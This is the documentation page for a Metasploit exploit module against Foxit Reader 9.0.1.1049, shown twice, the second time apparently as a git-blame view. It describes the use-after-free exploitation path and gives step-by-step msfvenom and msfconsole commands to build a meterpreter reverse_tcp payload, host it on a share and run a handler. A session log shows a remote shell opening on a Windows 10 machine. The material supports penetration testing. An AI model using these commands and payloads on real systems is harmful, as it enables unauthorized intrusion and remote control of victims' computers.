documentation/modules/exploit/windows/fileformat/foxit_reader_uaf.md

## Description

Foxit Reader v9.0.1.1049 and earlier are affected by use-after-free and uninitialzed memory vulnerabilities that can be used to gain code execution. This module uses Uint32Array uninitialized memory and text annotation use-after-free vulnerabilities to call WinExec with a share file path to download and execute the specified exe. The module has been tested against Foxit Reader v9.0.1.1049 running on Windows 10 Pro x64 Build 17134.

## Vulnerable Application

[Foxit Reader v9.0.1.1049](https://www.exploit-db.com/apps/1040d634123948886f664afc95ec0a5e-FoxitReader901_enu_Setup_Prom.exe) and earlier

## Verification Steps

1. `./msfvenom -p windows/meterpreter/reverse_tcp LHOST=<lhost> LPORT=<lport> --arch x86 -f exe /share/path/tmp.exe`
2. `chmod 777 /share/path/tmp.exe`
3. `./msfconsole -qx 'use exploit/windows/fileformat/foxit_reader_uaf ; set exename tmp.exe ; set share <share> ; set lhost <lhost> ; run`
4. `use multi/handler`
5. `set payload windows/meterpreter/reverse_tcp`
6. `set lhost <lhost>`
9. `run -j`
10. Copy pdf over to target. Start Foxit Reader then open pdf from Foxit's Menu.

Note: The target machine running Foxit Reader will need network access to the system hosting the exe.

## Scenarios

### Foxit Reader v9.0.1.1049 running on Windows 10 Pro x64 Build 17134

```
msfdev@simulator:~/git/metasploit-framework
$ ./msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.22.222.197 LPORT=4444 --arch x86 -f exe -o /opt/malicious/tmp.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
Saved as: /opt/malicious/tmp.exe
msfdev@simulator:~/git/metasploit-framework
$ chmod 777 /opt/malicious/tmp.exe 
msfdev@simulator:~/git/metasploit-framework
$ ./msfconsole -qx 'use exploit/windows/fileformat/foxit_reader_uaf ; set exename tmp.exe ; set share tmp ; set lhost 172.22.222.197 ; run '
exename => tmp.exe
share => tmp
lhost => 172.22.222.197
[*] share_path: \\172.22.222.197\tmp\tmp.exe
[+] test.pdf stored at /home/msfdev/.msf4/local/test.pdf
msf5 exploit(windows/fileformat/foxit_reader_uaf) > use multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 172.22.222.197
lhost => 172.22.222.197
msf5 exploit(multi/handler) > set exitonsession false
exitonsession => false
msf5 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 172.22.222.197:4444 
[*] Sending stage (179779 bytes) to 172.22.222.200
[*] Meterpreter session 1 opened (172.22.222.197:4444 -> 172.22.222.200:49673) at 2018-08-21 07:50:34 -0500

msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: DESKTOP\msfdev
```
Add Foxit Reader UAF Module and Docs 2018-08-21 08:17:29 -05:00			`## Description`

			`Foxit Reader v9.0.1.1049 and earlier are affected by use-after-free and uninitialzed memory vulnerabilities that can be used to gain code execution. This module uses Uint32Array uninitialized memory and text annotation use-after-free vulnerabilities to call WinExec with a share file path to download and execute the specified exe. The module has been tested against Foxit Reader v9.0.1.1049 running on Windows 10 Pro x64 Build 17134.`

			`## Vulnerable Application`

			`[Foxit Reader v9.0.1.1049](https://www.exploit-db.com/apps/1040d634123948886f664afc95ec0a5e-FoxitReader901_enu_Setup_Prom.exe) and earlier`

			`## Verification Steps`

			1. `./msfvenom -p windows/meterpreter/reverse_tcp LHOST=<lhost> LPORT=<lport> --arch x86 -f exe /share/path/tmp.exe`
			2. `chmod 777 /share/path/tmp.exe`
			3. `./msfconsole -qx 'use exploit/windows/fileformat/foxit_reader_uaf ; set exename tmp.exe ; set share <share> ; set lhost <lhost> ; run`
			4. `use multi/handler`
			5. `set payload windows/meterpreter/reverse_tcp`
			6. `set lhost <lhost>`
			9. `run -j`
			`10. Copy pdf over to target. Start Foxit Reader then open pdf from Foxit's Menu.`

			`Note: The target machine running Foxit Reader will need network access to the system hosting the exe.`

			`## Scenarios`

			`### Foxit Reader v9.0.1.1049 running on Windows 10 Pro x64 Build 17134`

			```
			`msfdev@simulator:~/git/metasploit-framework`
			`$ ./msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.22.222.197 LPORT=4444 --arch x86 -f exe -o /opt/malicious/tmp.exe`
			`[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload`
			`No encoder or badchars specified, outputting raw payload`
			`Payload size: 341 bytes`
			`Final size of exe file: 73802 bytes`
			`Saved as: /opt/malicious/tmp.exe`
			`msfdev@simulator:~/git/metasploit-framework`
			`$ chmod 777 /opt/malicious/tmp.exe`
			`msfdev@simulator:~/git/metasploit-framework`
			`$ ./msfconsole -qx 'use exploit/windows/fileformat/foxit_reader_uaf ; set exename tmp.exe ; set share tmp ; set lhost 172.22.222.197 ; run '`
			`exename => tmp.exe`
			`share => tmp`
			`lhost => 172.22.222.197`
			`[*] share_path: \\172.22.222.197\tmp\tmp.exe`
			`[+] test.pdf stored at /home/msfdev/.msf4/local/test.pdf`
			`msf5 exploit(windows/fileformat/foxit_reader_uaf) > use multi/handler`
			`msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp`
			`payload => windows/meterpreter/reverse_tcp`
			`msf5 exploit(multi/handler) > set lhost 172.22.222.197`
			`lhost => 172.22.222.197`
			`msf5 exploit(multi/handler) > set exitonsession false`
			`exitonsession => false`
			`msf5 exploit(multi/handler) > run -j`
			`[*] Exploit running as background job 0.`
			`[*] Started reverse TCP handler on 172.22.222.197:4444`
			`[*] Sending stage (179779 bytes) to 172.22.222.200`
			`[*] Meterpreter session 1 opened (172.22.222.197:4444 -> 172.22.222.200:49673) at 2018-08-21 07:50:34 -0500`

			`msf5 exploit(multi/handler) > sessions -i 1`
			`[*] Starting interaction with 1...`

			`meterpreter > sysinfo`
			`Computer : DESKTOP`
			`OS : Windows 10 (Build 17134).`
			`Architecture : x64`
			`System Language : en_US`
			`Domain : WORKGROUP`
			`Logged On Users : 2`
			`Meterpreter : x86/windows`
			`meterpreter > getuid`
			`Server username: DESKTOP\msfdev`
			```